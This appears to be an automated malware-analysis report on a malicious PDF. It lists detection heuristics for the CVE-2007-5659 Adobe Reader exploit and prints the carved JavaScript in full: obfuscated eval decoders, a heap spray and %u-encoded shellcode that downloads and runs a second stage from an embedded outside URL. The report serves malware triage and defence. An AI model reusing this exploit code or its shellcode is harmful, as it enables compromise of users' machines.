MALICIOUS
266
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains multiple embedded JavaScript streams, some of which are obfuscated using String.fromCharCode and other techniques. The heuristics indicate that the PDF launcher concatenates information fields, extracts characters at a fixed stride, and evaluates the result. This suggests the script's primary purpose is to download and execute a second-stage payload from a remote source, a common technique for initial access.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATEPDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.Matched line in script
var L6je5pyH = new Array();var WY__gFK8t006__w = 0;var P_00Hh_r = "";function e78__rQa2_FB__v(AU8O5qP34j, MY__To___ubf_X){var VLk04Ilw234V6p = MY__To___ubf_X.toString();var H4l7_6cn = "";for(var bp330arwN3uG = 0; bp330arwN3uG < VLk04Ilw234V6p.length; bp330arwN3uG++) {var i3W_TgR5kUk = parseInt(VLk04Ilw234V6p.substr(bp330arwN3uG, 1));if (!isNaN(i3W_TgR5kUk)) {i3W_TgR5kUk = i3W_TgR5kUk.toString(16);if (i3W_TgR5kUk.length == 1) { i3W_TgR5kUk = "0" + i3W_TgR5kUk; }else if (i3W_TgR5kUk.length != 2) { … -
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); } -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCANPDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://googleinru.in/cgi-bin/etn/z006106201r0019Reebe2cb9Xc1067111Y2c3cc32cZ0100f060 Referenced by PDF JavaScript
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0004_000.js |
pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1940 bytes |
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10";
function decrypt(str, jump){
var result = "";
var list = str.split(',');
for (var i=0; i < list.length; i++) {
result += String.fromCharCode(list[i] - jump);
}
return result;
}
|
|||
numeric_charcode_stage_000.js |
deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 505 bytes |
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
var proc = String.fromCharCode(22+15);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
}
if (app.plugIns.length >= 2) {
fnc += 'l';
app[fnc](buf);
}
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1B90 | 1839 bytes |
SHA-256: 5e8883b77cb9423a668d5630a09301e84fb8854fc1de2b2def92920811bc1f58 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function eI6_6o_676hb(F_0___MyX, rL_6w30P_P6_pFO){var CEm8k64__H = 4;var kE_p7FH__853tpi = new Array();var Nv8sk_63 = new Array(107,256,11, 512, 106, 11, 44,40, 33);Nv8sk_63[5] += 12;var le8MEk0us = "";try {var jj__xd_T6TO = 0;if (app) {rL_6w30P_P6_pFO = pr[jj__xd_T6TO].subject;}} catch(e) {}if (!F_0___MyX) { kE_p7FH__853tpi[0] = 0;kE_p7FH__853tpi[1] = kE_p7FH__853tpi[0];kE_p7FH__853tpi[2] = kE_p7FH__853tpi[1];kE_p7FH__853tpi[3] = kE_p7FH__853tpi[2];var B__574Cbc = Nv8sk_63[6] + 3;var m_5a__l = B__574Cbc + 11;var H__D8N_3d__8j7c = eI6_6o_676hb;var fPsAJ_w8fw8h = 0;H__D8N_3d__8j7c = H__D8N_3d__8j7c.toString();for(var t1__1HA__Y1_1_K = 0; t1__1HA__Y1_1_K < H__D8N_3d__8j7c.length; t1__1HA__Y1_1_K++) {var E1_o3ak6__gS_k = H__D8N_3d__8j7c.charCodeAt(t1__1HA__Y1_1_K);if (E1_o3ak6__gS_k > B__574Cbc && E1_o3ak6__gS_k < m_5a__l) {if (fPsAJ_w8fw8h == 4) {fPsAJ_w8fw8h = 0;}kE_p7FH__853tpi[fPsAJ_w8fw8h] += E1_o3ak6__gS_k;if (kE_p7FH__853tpi[fPsAJ_w8fw8h] > Nv8sk_63[3]) {kE_p7FH__853tpi[fPsAJ_w8fw8h] -= 512;}fPsAJ_w8fw8h++;}}}else { kE_p7FH__853tpi = F_0___MyX;}for (var j2M016 = 0; j2M016 < 4; j2M016++) {if (kE_p7FH__853tpi[j2M016] > Nv8sk_63[1]) {kE_p7FH__853tpi[j2M016] -= Nv8sk_63[1];}}var y1f1_C_q__1g = 0;var Y_Bbtf_R8O4 = 0;var Xi_0_l_I7c;var e5uU_5m48__t = 0;while ( y1f1_C_q__1g < rL_6w30P_P6_pFO.length ) {var R6w_K2__e = "";R6w_K2__e = rL_6w30P_P6_pFO.substr(y1f1_C_q__1g, 2);var AsdE_n_0x13et = parseInt(R6w_K2__e, Nv8sk_63[5]); if (Y_Bbtf_R8O4 == 4) {Y_Bbtf_R8O4 = 0;}AsdE_n_0x13et -= (e5uU_5m48__t + 2) * kE_p7FH__853tpi[Y_Bbtf_R8O4];if (AsdE_n_0x13et < 0) {AsdE_n_0x13et -= Math.floor(AsdE_n_0x13et / Nv8sk_63[1]) * Nv8sk_63[1];}le8MEk0us += String.fromCharCode(AsdE_n_0x13et);{y1f1_C_q__1g += 2;e5uU_5m48__t++;Y_Bbtf_R8O4++;}}var VWJM_3I5 = this;VWJM_3I5["eval"](le8MEk0us);return 0;}
eI6_6o_676hb(0);
|
|||
legacy_pdfkit_stage_001.js |
deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x4C3 | 4979 bytes |
SHA-256: 08f5dd48c8a7c653d1ec0a6ef8f069f76914376162b6701766260fc8638f5cb3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var L6je5pyH = new Array();var WY__gFK8t006__w = 0;var P_00Hh_r = "";function e78__rQa2_FB__v(AU8O5qP34j, MY__To___ubf_X){var VLk04Ilw234V6p = MY__To___ubf_X.toString();var H4l7_6cn = "";for(var bp330arwN3uG = 0; bp330arwN3uG < VLk04Ilw234V6p.length; bp330arwN3uG++) {var i3W_TgR5kUk = parseInt(VLk04Ilw234V6p.substr(bp330arwN3uG, 1));if (!isNaN(i3W_TgR5kUk)) {i3W_TgR5kUk = i3W_TgR5kUk.toString(16);if (i3W_TgR5kUk.length == 1) { i3W_TgR5kUk = "0" + i3W_TgR5kUk; }else if (i3W_TgR5kUk.length != 2) { i3W_TgR5kUk = "00"; }H4l7_6cn = i3W_TgR5kUk + H4l7_6cn;}}while(H4l7_6cn.length < 8) { H4l7_6cn = "0" + H4l7_6cn; }var c0cM_j = AU8O5qP34j.toString(16);if (c0cM_j.length == 1) { c0cM_j = "0" + c0cM_j; }else if (c0cM_j.length != 2) { c0cM_j = "00"; }H4l7_6cn = "3" + c0cM_j + "P" + H4l7_6cn;return H4l7_6cn;}function nk2C_K51_hc8mt(TP0gb520hu, B_88_yNj_dHU_2){var Bd_5ALq = new Array("");var B7_I_4PC1vt = TP0gb520hu;var mk3_x71_i;if ((mk3_x71_i = TP0gb520hu.lastIndexOf("%u00")) != -1) {if (mk3_x71_i + 6 == TP0gb520hu.length) {Bd_5ALq[0] = TP0gb520hu.substr(mk3_x71_i + 4, 2);B7_I_4PC1vt = TP0gb520hu.substring(0, mk3_x71_i);}}mk3_x71_i = 1;for (bp330arwN3uG = 0; bp330arwN3uG < B_88_yNj_dHU_2.length; bp330arwN3uG++) {var F2rh7___0_joQF = B_88_yNj_dHU_2.charCodeAt(bp330arwN3uG).toString(16);if (F2rh7___0_joQF.length == 1) { F2rh7___0_joQF = "0" + F2rh7___0_joQF; }Bd_5ALq[mk3_x71_i] = F2rh7___0_joQF;mk3_x71_i++;}bp330arwN3uG = Bd_5ALq[0].length ? 0 : 1;Bd_5ALq[mk3_x71_i] = "00";Bd_5ALq[mk3_x71_i + 1] = "00";mk3_x71_i += 2;if ((Bd_5ALq.length - bp330arwN3uG) % 2) {Bd_5ALq[mk3_x71_i] = "00";}while(bp330arwN3uG < Bd_5ALq.length) {B7_I_4PC1vt += "%u" + Bd_5ALq[bp330arwN3uG + 1] + Bd_5ALq[bp330arwN3uG];bp330arwN3uG += 2;}B7_I_4PC1vt += "%u0000";return B7_I_4PC1vt;}function o54hFj_43(aG_v1_LX6, JN1wHD){while (aG_v1_LX6.length*2<JN1wHD) {aG_v1_LX6 += aG_v1_LX6;}aG_v1_LX6 = aG_v1_LX6.substring(0,JN1wHD/2);return aG_v1_LX6;}function x73Cj_h_6d4r5eA(S_2K833, R___g_O_w2, xfcHns_qme2p){var M___nJ__d5W23_2 = 0x0c0c0c0c;var aG_v1_LX6 = unescape(R___g_O_w2);var B_88_yNj_dHU_2 = e78__rQa2_FB__v(S_2K833, xfcHns_qme2p);var sih_E____l = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var TP0gb520hu = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4270%u4e6b%u0078%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3136%u3630%u3032%u7231%u3030%u3931%u6552%u6265%u3265%u6263%u5839%u3163%u3630%u3137%u3131%u3259%u3363%u6363%u3233%u5a63%u3130%u3030%u3066%u3036";app.nK484Pj = unescape(nk2C_K51_hc8mt(TP0gb520hu, B_88_yNj_dHU_2));var AEn_d6DN = 0x400000;var tQ__ps = sih_E____l.length * 2;var JN1wHD = AEn_d6DN - (tQ__ps+0x38);aG_v1_LX6 = o54hFj_43(aG_v1_LX6, JN1wHD);var NwP2l15mEo = (M___nJ__d5W23_2 - 0x400000)/AEn_d6DN;for (var a_r0_t_8 = 0; a_r0_t_8 < NwP2l15mEo; a_r0_t_8++) {L6je5pyH[a_r0_t_8] = aG_v1_LX6 + sih_E____l;}}function lV2v_x6Q(){var uA6_0___yW____d = "";for (bp330arwN3uG = 0; bp330arwN3uG < 12; bp330arwN3uG++) {uA6_0___yW____d += unescape("%u0c0c%u0c0c");}var sIM2e_b_Ii = "";for (bp330arwN3uG = 0; bp330arwN3uG < 750; bp330arwN3uG++) {sIM2e_b_Ii += uA6_0___yW____d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: sIM2e_b_Ii});app.clearTimeOut(WY__gFK8t006__w);}function T__S_S_3B(h28UgPY63Hl7){var Re6BeKV8b = WY__gFK8t006__w;if ((h28UgPY63Hl7 >= 8 && h28UgPY63Hl7 < 8.11) || h28UgPY63Hl7 < 7.1) {x73Cj_h_6d4r5eA(23, "%u0c0c%u0c0c", h28UgPY63Hl7);lV2v_x6Q();}if (Re6BeKV8b) {app.clearTimeOut(Re6BeKV8b);}}var xfcHns_qme2p = 0;var m_2_n_62bh6t = app.plugIns;for (var wP__q52cmu0g_O = 0; wP__q52cmu0g_O < m_2_n_62bh6t.length; wP__q52cmu0g_O++) {var C_qtHO = m_2_n_62bh6t[wP__q52cmu0g_O].version;if (C_qtHO > xfcHns_qme2p) { xfcHns_qme2p = C_qtHO; }}if (app.viewerVersion == 9.103 && xfcHns_qme2p < 9.13) {xfcHns_qme2p = 9.13;}app.d_a2___5yPTw_l = T__S_S_3B;WY__gFK8t006__w = app.setTimeOut("app.d_a2___5yPTw_l(" + xfcHns_qme2p.toString() + ")", 50);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.